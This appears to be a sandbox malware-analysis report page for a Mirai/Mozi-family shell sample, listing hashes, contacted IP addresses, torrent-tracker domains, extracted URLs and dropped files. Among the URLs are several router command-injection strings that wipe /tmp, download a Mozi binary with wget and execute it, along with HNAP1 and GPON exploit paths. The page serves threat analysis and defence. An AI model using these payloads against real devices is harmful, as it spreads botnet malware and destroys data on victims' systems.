bin.sh

Status: finished

Submission Time: 2021-11-16 15:39:16 +01:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
522924
API (Web) ID:
890454
Analysis Started:

2021-11-16 15:43:38 +01:00
Analysis Finished:

2021-11-16 15:52:17 +01:00
MD5:
eec5c6c219535fba3a0492ea8118b397
SHA1:
292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:
12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 20/37

malicious

Score: 21/28

malicious

IPs

IP	Country	Detection
210.124.201.174	Korea Republic of
193.158.229.141	Germany
90.69.78.230	France
Click to see the 97 hidden entries
37.183.225.87	Italy
170.50.42.161	United States
223.68.174.98	China
100.247.223.10	United States
184.208.244.4	United States
191.195.251.222	Brazil
185.199.7.63	Russian Federation
26.170.22.231	United States
123.222.206.245	Japan
144.181.223.184	Norway
76.212.164.182	United States
17.132.17.181	United States
145.232.209.196	Switzerland
213.252.178.60	Germany
98.210.30.71	United States
70.112.192.65	United States
46.4.218.5	Germany
200.5.135.104	Venezuela
119.4.226.185	China
24.91.81.168	United States
94.141.229.241	Russian Federation
102.5.14.36	unknown
164.65.9.101	United States
139.175.26.151	Taiwan; Republic of China (ROC)
165.136.72.146	United States
211.77.127.153	Taiwan; Republic of China (ROC)
124.93.117.153	China
174.125.112.165	United States
104.217.29.14	United States
115.129.103.88	Australia
74.59.149.216	Canada
96.220.84.8	United States
201.253.51.131	Argentina
192.242.78.25	United States
106.202.19.20	India
38.158.59.90	United States
174.176.240.91	United States
75.150.131.245	United States
68.65.138.36	United States
194.181.5.184	Poland
154.32.220.46	United Kingdom
186.110.45.252	Argentina
176.190.90.3	France
110.161.16.195	Japan
73.44.243.3	United States
188.50.35.239	Saudi Arabia
82.222.206.85	Turkey
114.245.131.177	China
125.68.189.12	China
53.49.108.194	Germany
69.91.47.228	United States
187.11.37.82	Brazil
174.111.86.95	United States
77.72.157.219	Netherlands
193.48.239.12	France
4.252.44.159	United States
76.217.46.172	United States
166.65.80.38	New Zealand
97.109.239.27	Canada
221.136.35.240	China
98.80.130.179	United States
118.241.131.48	Japan
27.219.31.91	China
147.239.8.164	United States
84.216.74.60	Sweden
197.103.198.60	South Africa
221.121.67.245	Australia
172.47.177.11	United States
203.76.80.94	Japan
85.44.173.79	Italy
195.142.249.103	Turkey
22.89.26.204	United States
16.21.94.155	United States
105.152.92.179	Morocco
39.58.236.135	Pakistan
120.26.205.75	China
212.58.38.181	United Kingdom
217.198.0.163	Russian Federation
86.66.84.251	France
122.145.165.234	Japan
145.200.155.76	Netherlands
59.192.38.107	China
133.60.186.200	Japan
181.65.68.78	Peru
63.89.240.37	United States
94.203.207.167	United Arab Emirates
86.125.111.1	Romania
175.210.60.254	Korea Republic of
147.45.243.245	Russian Federation
67.194.169.78	United States
163.55.185.59	Japan
88.117.139.76	Austria
163.136.89.118	Japan
135.114.116.178	United States
67.154.225.218	United States
168.122.210.178	United States
105.87.139.22	Egypt

Domains

Name	IP	Detection
dht.transmissionbt.com	87.98.162.88
bttracker.acc.umu.se	130.239.18.158
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://175.119.69.229:80/HNAP1/
http://112.74.206.52:80/HNAP1/
http://221.128.175.114:80/HNAP1/
Click to see the 34 hidden entries
http://52.54.104.1:80/HNAP1/
http://%s:%d/bin.sh
http://201.49.41.72:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://3.113.149.148:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://216.180.103.7:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://%s:%d/bin.sh;chmod
http://122.201.116.141:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://HTTP/1.1
http://%s:%d/Mozi.a;sh$
http://www.pastebin.ca.
http://www.alsa-project.org.
http://%s:%d/Mozi.m;
http://www.alsa-project.org/alsa-info.sh
http://purenetworks.com/HNAP1/
http://www.pastebin.ca
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://127.0.0.1sendcmd
http://ipinfo.io/ip
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.alsa-project.org/cardinfo-db/
http://%s:%d/Mozi.m
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://schemas.xmlsoap.org/soap/envelope/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d/Mozi.a;chmod
http://pastebin.ca)

Dropped files

Name	File Type	Hashes
/etc/init.d/mountall.sh	ASCII text	#
/usr/bin/gettext.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh	ASCII text, with very long lines	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#

bin.sh

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

bin.sh Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

bin.sh